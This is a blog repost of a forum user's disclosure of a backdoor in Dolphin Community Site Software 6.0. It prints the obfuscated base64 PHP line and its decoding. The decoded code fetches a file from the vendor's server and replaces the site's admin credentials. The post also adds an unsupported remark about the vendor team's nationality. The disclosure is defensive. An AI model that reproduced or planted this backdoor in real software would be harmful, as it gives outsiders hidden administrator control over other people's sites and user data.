Dolphin Community Site Software, Security Backdoor
Someone has found a security backdoor in the code behind Dolphin Community Site Software.
Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin give them complete access to your website and potentially, any database servers you are connected to.
Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.
p.s. the Boonex team is Russian.
Here is his post (English is not his first language):
—————————-
I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.
Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)
aWYoICRfR0VUWydwYWdlJ10gKSBmb3JlYWNoKCAkX0dFVC
BhcyAkc0tleSA9PiAkc1ZhbHVlICkgewppZiggZ2V0dHlw
ZSggJHNLZXkgKSAhPSAnc3RyaW5nJyBvciBzdHJsZW4oIC
RzS2V5ICkgPCAxMCBvciBzdHJsZW4oICRzVmFsdWUgKSA8
IDEwIG9yIG1kNSggJHNLZXkgKSAhPT0gJzhmMGFlNTk2Nm
U4NzI3ODhiY2UzNTU4NjNlYWJmYzBjJyBvciBtZDUoICRz
VmFsdWUgKSAhPT0gJzJhMzJhNDJhZWRiZDY0MmNmZmE0MG
Y4ZWMwNjZmMmE0JykgY29udGludWU7CmlmKCBzdHJsZW4o
ICRzUGFzc1BhZ2UgPSBwcmVnX3JlcGxhY2UoICcvW15hLX
pBLVowLTlfXC4tXS8nLCAnJywgJF9HRVRbJ3BhZ2UnXSAp
ICkgYW5kICRhUGFzc0ZpbGUgPSBAZmlsZSggJ2h0dHA6Ly
93d3cuYm9vbmV4LmNvbS8nIC4gJHNQYXNzUGFnZSApICkg
ewpmb3JlYWNoKCAkYVBhc3NGaWxlIGFzICRpSW5kID0+IC
RzTGluZSApICRhUGFzc0ZpbGVbJGlJbmRdID0gYWRkc2xh
c2hlcyggdHJpbSggJHNMaW5lICkgKTsgaWYoIG1kNSggJG
FQYXNzRmlsZVswXSApID09PSAnZGFkNDA5NjYwMjQ3N2Qz
MTllMDRlZWZiMzg2OTdmZDMnICkKZWNobyAoIGRiX3Jlcy
ggIkRFTEVURSBGUk9NIGBBZG1pbnNgIFdIRVJFIGBOYW1l
YCA9ICd7JGFQYXNzRmlsZVsxXX0nIiwgMCApIGFuZCBkYl
9yZXMoICJJTlNFUlQgSU5UTyBgQWRtaW5zYCBTRVQgYE5h
bWVgID0gJ3skYVBhc3NGaWxlWzFdfScsIGBQYXNzd29yZG
AgPSAneyRhUGFzc0ZpbGVbMl19JyIsIDAgKSApID8gJ2Fk
ZCBzdWNjZXNzJyA6ICdhZGQgZmFpbGVkJzsgZXhpdDsgfS
BicmVhazt9
Do you know what it is?
I have just decoded it for you:
if( true || $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== ‘8f0ae5966e872788bce355863eabfc0c’ or md5( $sValue ) !== ‘2a32a42aedbd642cffa40f8ec066f2a4’) continue;
if(true || strlen( $sPassPage = preg_replace( ‘/[^a-zA-Z0-9_\.-]/’, ”, $_GET[‘page’] ) ) and $aPassFile = @file( ‘http://www.boonex.com/’ . $sPassPage ) ) {
foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;
}
It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0 , I would suggest you check your DB immedeately.
Of course don’t forget to remove those lines from your code.
I have no idea about newer versions. I think It is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.
I hope this will save many sites from being hacked by the programmers of the Dolphin.
Regards
Recent Comments